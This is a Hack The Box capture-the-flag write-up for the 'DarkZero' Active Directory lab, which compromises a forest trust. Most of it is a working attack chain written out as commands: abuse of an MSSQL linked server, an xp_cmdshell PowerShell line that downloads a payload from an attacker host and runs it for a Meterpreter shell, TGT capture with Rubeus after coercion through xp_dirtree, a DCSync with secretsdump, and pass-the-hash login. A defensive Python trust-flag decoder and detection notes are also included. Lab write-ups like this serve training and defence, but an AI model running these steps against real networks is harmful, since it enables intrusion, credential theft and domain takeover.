DarkZero – Hack The Box Writeup
As is common in real-world pentests, the DarkZero box provides initial credentials:
Username: john.w
Password: RFulUtONCOL!
sudo nmap -p- -sV --min-rate 1000 10.10.11.89

PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
1433/tcp open  ms-sql-s
2179/tcp open  vmrdp
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  wsman
9389/tcp open  adws

Nmap done: 1 IP address (1 host up) scanned in 0.91 seconds

The port set (53, 88, 389/636, 3268/3269, 464, 9389) is a domain controller with MSSQL (1433) and WinRM (5985) on top. The given credentials are valid for MSSQL, LDAP, and SMB.

MSSQL Access & Linked Server Abuse
impacket-mssqlclient darkzero.htb/john.w:RFulUtONCOL\!@10.10.11.89 -windows-auth
enum_links
use_link "DC02.darkzero.ext"
Enable xp_cmdshell on the linked server. This only works because the link has RPC Out enabled and the login it maps to is sysadmin on DC02's instance; without either, sp_configure fails:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
Reverse Shell via xp_cmdshell
Configure payload in msfconsole:

Run exploit:

Copy payload to .bat file:

Execute on target:
EXEC xp_cmdshell 'powershell -Command "Invoke-WebRequest -Uri http://$ip/payload.bat -OutFile C:\Windows\Temp\payload.bat; C:\Windows\Temp\payload.bat"'
File downloaded & executed → shell obtained:

Meterpreter session:

use session 3
Local exploit suggester:
run post/multi/recon/local_exploit_suggester
Set options & run:

Hashdump (for reference):

Discovering Dangerous Forest Trust Delegation
Using PowerView (the powerview.py port, authenticated as darkzero-ext\Administrator against DC01):
╭─LDAPS─[DC01.darkzero.htb]─[darkzero-ext\Administrator]-[NS:<auto>] [CACHED]
╰─PV ❯ Get-NetTrust
...
trustAttributes : FOREST_TRANSITIVE, CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION
...
WARNING: The CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION flag on this trust means TGTs of darkzero.htb principals may be forwarded across the forest boundary to hosts in darkzero.ext that are trusted for unconstrained delegation. That is exactly the behaviour the hardened default (CROSS_ORGANIZATION_NO_TGT_DELEGATION) exists to block, so this is a very dangerous misconfiguration.
Domain controllers are trusted for unconstrained delegation by default and we already hold Administrator on DC02, so if we coerce DC01 to authenticate to DC02, DC01$'s forwardable TGT lands in DC02's LSASS where we can harvest it.
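To make the trust check reproducible, here is an added Python example (written for this page, not code from the writeup or from PowerView) that decodes a raw trustAttributes integer, as LDAP returns it, into its MS-ADTS flag names and reports the bits that change the trust's security boundary. The bit values come from MS-ADTS section 6.1.6.7.9; the value 0x808 used in the demo is the sum of the two flags printed above and is an assumption, since the writeup shows names rather than the integer.

```python
"""Decode an AD trustedDomain object's trustAttributes value and flag risky bits."""

# Bit definitions from MS-ADTS section 6.1.6.7.9 (trustAttributes).
TRUST_ATTRIBUTE_FLAGS = {
    0x0001: "NON_TRANSITIVE",
    0x0002: "UPLEVEL_ONLY",
    0x0004: "QUARANTINED_DOMAIN",
    0x0008: "FOREST_TRANSITIVE",
    0x0010: "CROSS_ORGANIZATION",
    0x0020: "WITHIN_FOREST",
    0x0040: "TREAT_AS_EXTERNAL",
    0x0080: "USES_RC4_ENCRYPTION",
    0x0200: "CROSS_ORGANIZATION_NO_TGT_DELEGATION",
    0x0400: "PIM_TRUST",
    0x0800: "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION",
}

KNOWN_MASK = 0
for _bit in TRUST_ATTRIBUTE_FLAGS:
    KNOWN_MASK |= _bit


def decode_trust_attributes(value: int) -> list[str]:
    """Return the flag names set in `value`, lowest bit first.

    Bits not in the table are reported as UNKNOWN_0x... rather than silently dropped,
    so a future or vendor-specific bit is never hidden from the reviewer.
    """
    names = [name for bit, name in sorted(TRUST_ATTRIBUTE_FLAGS.items()) if value & bit]
    leftover = value & ~KNOWN_MASK
    if leftover:
        names.append(f"UNKNOWN_0x{leftover:X}")
    return names


def assess_trust(value: int) -> list[str]:
    """Return findings for the bits that weaken the boundary between the two forests."""
    flags = set(decode_trust_attributes(value))
    findings = []
    if "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION" in flags:
        findings.append(
            "TGT delegation enabled across the trust: this forest's principals, DC machine "
            "accounts included, will forward their TGTs to hosts in the peer forest that "
            "are trusted for unconstrained delegation"
        )
    if "USES_RC4_ENCRYPTION" in flags:
        findings.append(
            "trust uses RC4: inter-realm referral tickets are protected by a weak cipher"
        )
    if "FOREST_TRANSITIVE" in flags and "TREAT_AS_EXTERNAL" in flags:
        findings.append(
            "forest trust treated as external: SID filtering is relaxed to external-trust rules"
        )
    return findings


if __name__ == "__main__":
    # 0x808 is FOREST_TRANSITIVE | CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION, the
    # combination seen on the box (assumed integer); 0x208 is the hardened equivalent.
    for label, value in (("darkzero.ext trust (as seen)", 0x808), ("hardened default", 0x208)):
        print(f"{label}: 0x{value:X} -> {decode_trust_attributes(value)}")
        for finding in assess_trust(value) or ["no findings"]:
            print("   ", finding)
```

Running it prints one finding for 0x808 and none for 0x208. The same decoder applies to any trustedDomain object pulled with ldapsearch or ldap3, which is how a defender would sweep every trust in a forest for the 0x800 bit instead of reading one PowerView line.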
Rubeus.exe – Kerberos Swiss Army Knife
Rubeus is a powerful post-exploitation tool for raw Kerberos interaction and abuse in Active Directory.
It is very commonly used by real attackers, so its presence outside labs/red-team engagements is a major red flag.
Official project: GhostPack/Rubeus
(Precompiled binary used: r3motecontrol/Ghostpack-CompiledBinaries)
Written in C# — runs entirely in user space
Purpose: Interact directly with Kerberos tickets, LSA memory, and Domain Controllers.
Key capabilities used in this attack:
- Ticket monitoring (monitor): watches for new TGTs at set intervals
- Ticket harvesting (harvest, triage, dump): extracts usable tickets
- Pass-the-Ticket (ptt): injects stolen tickets into sessions
- Delegation abuse (s4u, unconstrained delegation exploits)
OpSec note: Many actions (especially rc4_hmac usage) are detectable via EDR, DC logs (encryption downgrade), or abnormal port 88 traffic from non-lsass.exe processes.
Uploading Rubeus.exe to our session on DC02:
upload /home/alphabeta/Downloads/Rubeus.exe
Start monitoring for incoming TGTs:
Rubeus.exe monitor /interval:5 /nowrap
Trigger authentication from DC01 to DC02. This is run on the DC01 MSSQL instance (the one we first connected to, not through the link): the SQL service on DC01 resolves the UNC path and authenticates to DC02 over Kerberos as the machine account, and because the trust allows TGT delegation and DC02 is trusted for unconstrained delegation, DC01$'s forwardable TGT arrives in DC02's LSASS:
EXEC xp_dirtree '\\DC02.darkzero.ext\sfsdafas';
DC01$ machine TGT captured!

Save ticket:

Convert base64 → .kirbi:

Convert .kirbi → .ccache (for impacket):

Set environment:

DCSync with Stolen DC Machine Ticket
impacket-secretsdump -k -no-pass darkzero.htb/DC01\$@DC01.darkzero.htb
Full domain hash dump achieved, including krbtgt, which allows golden tickets or pass-the-hash everywhere. Note that -k -no-pass reads the ccache from KRB5CCNAME and the target must be given as the FQDN (DC01.darkzero.htb), not the IP, so that the service ticket impacket requests matches the host's SPN.
Final Access & Flags
Use evil-winrm (or PTH/golden ticket):
evil-winrm -i 10.10.11.89 -u Administrator -H <NTLM hash>
user.txt and root.txt are readable from the Administrator session. Machine pwned!
